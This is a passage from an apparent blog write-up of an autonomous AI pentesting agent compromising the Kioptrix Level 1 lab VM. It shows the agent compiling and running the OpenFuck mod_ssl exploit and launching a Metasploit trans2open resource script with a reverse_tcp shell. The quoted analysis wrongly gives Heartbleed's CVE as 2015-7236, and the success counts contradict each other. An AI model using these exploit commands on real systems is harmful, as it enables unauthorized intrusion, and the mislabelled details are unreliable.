Key version filtering in action: exploit/multi/samba/usermap_script (which worked on Metasploitable 2) was blocked 7 times — it requires Samba 3.0.x, and this target runs 2.2.1a. The RAG system correctly routes to trans2open instead, which targets the 2.2.x range.
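Version-aware filtering of this kind comes down to a range comparison. The sketch below encodes "3.0.x" and "2.2.x" as illustrative bounds. They are my shorthand for the ranges named in the paragraph, not the exact affected ranges from the advisories, and `RULES`, `parse_version`, and `applicable` are hypothetical names.

```python
import re

def parse_version(text):
    """'2.2.1a' -> (2, 2, 1). Trailing letters such as 'a' are ignored."""
    return tuple(int(n) for n in re.findall(r"\d+", text)[:3])

def in_range(version, low, high):
    """Inclusive comparison on parsed version tuples."""
    return parse_version(low) <= parse_version(version) <= parse_version(high)

# Illustrative bounds standing in for "3.0.x" and "2.2.x"
RULES = {
    "exploit/multi/samba/usermap_script": ("3.0.0", "3.0.99"),
    "exploit/linux/samba/trans2open": ("2.2.0", "2.2.99"),
}

def applicable(module, detected_version):
    low, high = RULES[module]
    return in_range(detected_version, low, high)

kioptrix = {module: applicable(module, "2.2.1a") for module in RULES}
metasploitable = {module: applicable(module, "3.0.20") for module in RULES}
```

Comparing tuples of integers avoids the classic string-comparison trap in which "3.0.9" sorts after "3.0.20".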

Step 5 — CVE_INTEL: 1 CVE + 25 ExploitDB Entries

Because Kioptrix’s software is so old, NVD’s post-2010 API returns limited data (only 1 CVE). But ExploitDB has 25 public exploit entries for the detected services — plenty of historical PoC material for analyst review.

Step 6 — ANALYZE: LLM Identifies the Right Attack Vectors

Summary of Attack Surface — Target: 192.168.36.128

Open Services:
  - SSH (port 22): OpenSSH 2.9p2 — vulnerable to brute force attacks
  - HTTP/HTTPS (80/443): Apache 1.3.20 with potential web vulnerabilities
  - RPCBIND (port 111): rpcbind 2, susceptible to CVE-2015-7236
  - Samba (port 139): Samba 2.2.1a, vulnerable to various exploits

Top 3 Entry Points:
  1. SSH Brute Force — high priority (open SSH service)
  2. Heartbleed (CVE-2015-7236) — high impact on HTTPS
  3. Trans2open (Samba 2.2.1a) — leads to remote code execution

Step 7 — PLANNER: 9 Commands, 2 LLM Duplicates Dropped

Priority breakdown:
  0  analyst-priority commands
  2  LLM-suggested commands       (both duplicates of RAG — dropped)
  7  RAG template commands
  ─────────────────────────────
  9  total

The LLM independently suggested exploit/linux/samba/trans2open and exploit/unix/remote/openfuck — exactly what RAG already had. Duplicates dropped, RAG versions kept (they carry pre-verified metadata).

Step 8 — VALIDATE: All 9 Commands Cleared

✔ auxiliary/scanner/ssh/ssh_login
✔ auxiliary/scanner/ssl/openssl_heartbleed
✔ auxiliary/scanner/http/dir_scanner
✔ exploit/unix/remote/openfuck        (via compiled C binary)
✔ exploit/linux/samba/trans2open      (via RC file)
... (9 total)

No blocks this run — every command had resolved placeholders and passed version checks.

Step 9 — EXECUTE: Two Exploits Hit, Shell on Command 4

[1] auxiliary/scanner/ssh/ssh_login          ✘ FAIL   — msfadmin:msfadmin doesn't exist on Kioptrix
[2] exploit/unix/remote/openfuck             ✔ SUCCESS — compiled OpenFuck, got shell via mod_ssl overflow
[3] auxiliary/scanner/ssl/openssl_heartbleed ✘ FAIL   — no heartbeat response (not vulnerable)
[4] msfconsole -r /tmp/kioptrix_pwn.rc       ✔ SUCCESS — Samba trans2open → shell
    🎯 SHELL OBTAINED — skipping remaining 5 commands

Command 2 — OpenFuck (CVE-2002-0082) is the most interesting. The agent built and ran a full C exploit pipeline autonomously:

# The agent did all of this in a single command:

# 1. Fetched the exploit source (ExploitDB #47080)
cp /usr/share/exploitdb/exploits/unix/remote/47080.c /tmp/47080.c

# 2. Compiled it (with OpenSSL fallbacks for modern Kali)
gcc -o /tmp/OpenFuck /tmp/47080.c -lssl -lcrypto -Wno-deprecated-declarations

# 3. Ran it with the correct offset for RedHat 7.2 apache-1.3.20-16
/tmp/OpenFuck 0x6b 192.168.36.128 443 -c 40
# offset 0x6b = "RedHat 7.2 apache-1.3.20-16 variant 2"

# Output:
# === Trying offset 0x6b (RedHat 7.2 apache-1.3.20-16 variant 2) ===
# * OpenFuck v3.0.4-root priv8 by SPABAM based on openssl-too-open *
# [shell obtained]

Command 4 — Samba trans2open used a pre-written Metasploit resource script (/tmp/kioptrix_pwn.rc):

resource (/tmp/kioptrix_pwn.rc)> use exploit/linux/samba/trans2open
[*] No payload configured, defaulting to linux/x86/meterpreter/reverse_tcp
resource (/tmp/kioptrix_pwn.rc)> set RHOSTS 192.168.36.128
RHOSTS => 192.168.36.128
[*] Started reverse TCP handler
[*] Trying return address 0xbffffXXX...
[+] 192.168.36.128:139 - Shell obtained!

From root  Sat Sep 26 11:42:10 2009
Subject: About Level 2

If you are reading this, you got root. Congratulations.
Level 2 won't be as easy...

Step 10 — CRED_REUSE: Skipped

No credentials were extracted during exploitation (both winning exploits gave direct shell access without dumping auth data), so the credential reuse phase was skipped entirely.

[NODE:CRED-REUSE] No credentials found — skipping.

Final Result

╔══════════════════════════════════════╗
║   TARGET COMPROMISED                 ║
║   1 VECTOR SUCCESSFUL                ║
║                                      ║
║   Target:  192.168.36.128            ║
║   Outcome: Root shell (no creds)     ║
║   Time:    ~4 minutes                ║
╚══════════════════════════════════════╝

Key Takeaways From This Run

Observation	Why It Matters
SSH brute-force failed (no fallback credentials)	Kioptrix has no default creds; the agent adapted without stalling
RAG blocked `usermap_script` 7 times (wrong Samba version)	Version-aware filtering prevents wasted time on incompatible exploits
Agent compiled a 2002 C exploit from source autonomously	The planner encodes the full fetch → compile → run chain in one command
OpenFuck succeeded AND trans2open succeeded	Two independent attack paths both worked; the run ended after command 4, with 5 commands left unexecuted
Heartbleed returned no data	Target’s OpenSSL/0.9.6b predates the TLS heartbeat extension (added in OpenSSL 1.0.1), so the scanner correctly found no leak
CRED_REUSE skipped cleanly	Agent only runs phases where there’s something to work with

Comparing the Two Runs

Metric	Metasploitable 2	Kioptrix Level 1
Open ports	18	5
MSF modules found	206	52
RAG matches	16	7
Commands queued	17	9
Winning exploit	SSH brute-force (default creds)	mod_ssl OpenFuck (CVE-2002-0082)
Credential reuse	6/6 successful	Skipped (no creds)
Attack class	Credential-based	Binary exploitation (buffer overflow)

Both targets fell in about 4 minutes. Different software, different attack paths, same autonomous outcome.

Built and written by Rusheel. All testing performed on authorized, intentionally vulnerable VMs. This project is intended for educational purposes, CTF practice, and authorized penetration testing only.

How I Built Phantom Red — An AI Agent That Hunts Vulnerabilities and Auto Exploits

